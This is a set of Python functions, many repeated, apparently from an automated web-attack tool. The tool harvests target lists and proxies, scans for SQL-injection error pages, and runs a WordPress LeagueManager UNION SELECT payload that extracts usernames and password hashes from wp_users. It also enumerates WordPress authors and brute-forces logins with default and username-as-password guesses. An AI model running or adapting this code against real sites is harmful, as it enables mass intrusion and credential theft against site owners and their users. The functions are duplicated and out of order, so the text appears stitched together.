def base_scrape_alexa(url, browser_args, out_name, add_http): b = Browser(name, **browser_args) r = b.go(url) zip_file = StringIO(r.content) z = ZipFile(zip_file, 'r') csv_file = 'top-1m.csv' z.extract(csv_file, out_dir) file_path = path.join(out_dir, csv_file) lines = strip_open(file_path) out_path = path.join(out_dir, out_name) if add_http: os.remove(file_path) with open(out_path, 'w+') as f: for line in lines: print >> f, 'http://' + line.split(',')[1] else: try: os.rename(file_path, out_path) except Exception as e: pass return len(lines)
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts): b = Browser(url, **browser_args) r = b.go(url.replace(ident,str(num))) match = findall('{}(.*){}'.format(left,right), r.text) if match: return match[0] return attempts
def scan_js(url, browser_args): b = Browser(name, **browser_args) r = b.go(url) files = [] for link in findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', r.text): if link.endswith('.js'): files.append(link) return files
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts): b = Browser(url, **browser_args) r = b.go(url.replace(ident, str(num))) match = findall('{}(.*){}'.format(left, right), r.text) if match: return match[0] return attempts
def base_check_keyword(link, browser_args, keywords, check_url=False): b = Browser(name, **browser_args) r = b.go(link) if any(x in r.text for x in keywords): return r.url if check_url: if any(x in r.url for x in keywords): return r.url return ''
def base_sqli_scan(url, browser_args): b = Browser(name, **browser_args) sqli_keys = [['sql', 'syntax'], ['syntax', 'error'], ['sql', 'error'], ['query', 'failed'], ['incorrect', 'syntax']] r = b.go(url) if any(all(key in r.text for key in sub) for sub in sqli_keys): return url
def scan_js(url, browser_args): b = Browser(name, **browser_args) r = b.go(url) files = [] for link in findall( 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', r.text): if link.endswith('.js'): files.append(link) return files
def base_wp_leaguemanager(url, browser_args): b = Browser(name, **browser_args) params = {'league_id' : '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode' : 'teams', 'leaguemanager_export' : 'Download+File'} r = b.go(url, data=params) match = findall('21\t(.*)\t2.*0\t(.*)\t15', r.text) if match: return ':'.join(match[0])
def base_check_proxy(proxy, browser_args, target_site, target_key): b = Browser(name, change_proxy=False, max_retries=2, max_timeouts=2, **browser_args) bad = False try: r = b.go(target_site, proxy=proxy) except Exception as e: return if r.ok and target_key in r.text: return proxy
def wp_init(url, browser_args, job_name, out_name): params = base_wp_init(url, browser_args) b = Browser(name, **browser_args) r = b.go(url, data=params) if WP_GDKEY in r.text: celery_output.delay(out_format(out, params), name, job_name, out_name) elif WP_BUSER in r.text: wp_user.delay(url, browser_args, job_name, out_name, params) else: wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
def base_scan_dom(url, browser_args): b = Browser(name, **browser_args) r = b.go(url) if url.endswith('.js'): return _scan_dom(r.text) matches = [] doc = html.document_fromstring(r.text) for elem in doc.xpath('//script'): matches.extend(_scan_dom(elem.text_content())) return matches
def base_scrape_headers(link, browser_args, match): b = Browser(name, **browser_args) r = b.go(link) if not match: return dict(r.headers) matches = {} for field in match: value = r.headers.get(field) if value: matches[field] = value return matches
def base_scrape_quantcast(num, browser_args): b = Browser(name, **browser_args) url = "http://www.quantcast.com/top-sites/US/{}".format(num) r = b.go(url) site = lxml.html.document_fromstring(r.text) site.make_links_absolute(r.url) links = site.find_class("twoColumn")[0] output = [] for element, attribute, uri, pos in links.iterlinks(): if attribute == "href": output.append("http://" + element.text) return output
def base_sqli_scan(url, browser_args): b = Browser(name, **browser_args) sqli_keys = [ ['sql','syntax'], ['syntax','error'], ['sql', 'error'], ['query', 'failed'], ['incorrect', 'syntax'] ] r = b.go(url) if any( all(key in r.text for key in sub) for sub in sqli_keys): return url
def base_scrape_quantcast(num, browser_args): b = Browser(name, **browser_args) url = 'http://www.quantcast.com/top-sites/US/{}'.format(num) r = b.go(url) site = lxml.html.document_fromstring(r.text) site.make_links_absolute(r.url) links = site.find_class('twoColumn')[0] output = [] for element, attribute, uri, pos in links.iterlinks(): if attribute == 'href': output.append('http://' + element.text) return output
def base_wp_leaguemanager(url, browser_args): b = Browser(name, **browser_args) params = { 'league_id': '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode': 'teams', 'leaguemanager_export': 'Download+File' } r = b.go(url, data=params) match = findall('21\t(.*)\t2.*0\t(.*)\t15', r.text) if match: return ':'.join(match[0])
def base_scan_wp(url, browser_args): WP_LOGIN = '******' WP_VALID = ['loginform'] WP_CAPCH = ['cptch_block'] b = Browser(name, **browser_args) if not url.endswith(WP_LOGIN): url = urljoin(url, WP_LOGIN) try: r = b.go(url) except Exception as e: return if r.ok and all(x in r.text for x in WP_VALID) and not any(x in r.text for x in WP_CAPCH): return url
def base_wp_init(url, browser_args): b = Browser(name, **browser_args) r = b.go(url) params = {'log': 'admin', 'wp_submit': 'Log In', 'pwd': 'admin'} redirect = findall( '"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text) testcook = findall( '"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text) if redirect: params['redirect_to'] = redirect[0] if testcook: params['testcookie'] = testcook[0] return params
def base_wp_init(url, browser_args): b = Browser(name, **browser_args) r = b.go(url) params = { 'log' : 'admin', 'wp_submit' : 'Log In', 'pwd' : 'admin'} redirect = findall('"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text) testcook = findall('"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text) if redirect: params['redirect_to'] = redirect[0] if testcook: params['testcookie'] = testcook[0] return params
def base_find_user(url, browser_args, params): WP_LOGIN = '******' b = Browser(name, **browser_args) url_author = url.replace(WP_LOGIN, '?author=1') r = b.go(url_author) user = '' if 'author/' in r.url: user = findall('author\/([\d\w\-]+)\/', r.url + '/')[0] elif 'archive author author-' in r.text: pos_user = findall('archive author author-([\d\w\-]+)', r.text) if pos_user: user = pos_user[0] if not user: return params['log'] = user params['pwd'] = user return params
def base_link_scraper(link, browser_args, past, include_external): b = Browser(name, **browser_args) past.append(link) r = b.go(link) doc = lxml.html.document_fromstring(r.text) doc.make_links_absolute(r.url) root = urlparse(r.url).netloc output = [] for element, attribute, uri, pos in doc.iterlinks(): if attribute != 'href' or uri in past: continue past.append(uri) url_is_external = urlparse(uri).netloc != root include_external = include_external or not url_is_external if include_external: output.append(uri) return output
def base_scrape_proxy(num, browser_args): b = Browser(name, **browser_args) url = 'http://hidemyass.com/proxy-list/{}'.format(num) r = b.go(url) doc = lxml.html.document_fromstring(r.text) table = doc.get_element_by_id('listtable') rows = table.getchildren()[1:] ips = [] for row in rows: columns = row.getchildren() port = columns[2].text_content().strip() info = columns[1].getchildren()[0].getchildren() style = lxml.html.tostring(info[0]) bad_styles = [] for css in style.splitlines()[1:-1]: if 'none' in css: bad_styles.append(css.split('{')[0][1:]) ip = '' tricky_style = re.findall('<\/style>(\d{1,3})', style) if tricky_style: ip += tricky_style[0] + '.' for span in info[1:]: span_html = lxml.html.tostring(span) tricky_html = re.findall('(?:<\/span>|<\/div>)\.?(\d{1,3})', span_html) if tricky_html: ip += tricky_html[0] + '.' if 'none' not in span_html and not any(bad in span_html for bad in bad_styles): span_text = span.text_content() if re.search('\d', span_text): ip += span_text + '.' ips.append(ip[:-1] + ':' + port) return ips
def init_wp(self, my_link): if my_link.pwd: return do_brute(my_link) try: params = base_wp_init(my_link.item, self.browser_args) except Exception as e: return self.error_catch('wp init', my_link, e) b = Browser(name, **self.browser_args) r = b.go(my_link.item, data=params) if not all(x in r.text for x in WP_VALID): return if WP_GDKEY in r.text: return self.output.append(out_format(my_link.item, params)) elif WP_BUSER in r.text: params = base_find_user(my_link.item, self.browser_args, params) if not params: return my_link.params = params self.to_input.append(my_link)
def base_scrape_proxy(num, browser_args): b = Browser(name, **browser_args) url = "http://hidemyass.com/proxy-list/{}".format(num) r = b.go(url) doc = lxml.html.document_fromstring(r.text) table = doc.get_element_by_id("listtable") rows = table.getchildren()[1:] ips = [] for row in rows: columns = row.getchildren() port = columns[2].text_content().strip() info = columns[1].getchildren()[0].getchildren() style = lxml.html.tostring(info[0]) bad_styles = [] for css in style.splitlines()[1:-1]: if "none" in css: bad_styles.append(css.split("{")[0][1:]) ip = "" tricky_style = re.findall("<\/style>(\d{1,3})", style) if tricky_style: ip += tricky_style[0] + "." for span in info[1:]: span_html = lxml.html.tostring(span) tricky_html = re.findall("(?:<\/span>|<\/div>)\.?(\d{1,3})", span_html) if tricky_html: ip += tricky_html[0] + "." if "none" not in span_html and not any(bad in span_html for bad in bad_styles): span_text = span.text_content() if re.search("\d", span_text): ip += span_text + "." ips.append(ip[:-1] + ":" + port) return ips
def base_wp_brute(url, browser_args, params): b = Browser(name, **browser_args) r = b.go(url, data=params) if WP_GDKEY in r.text: return url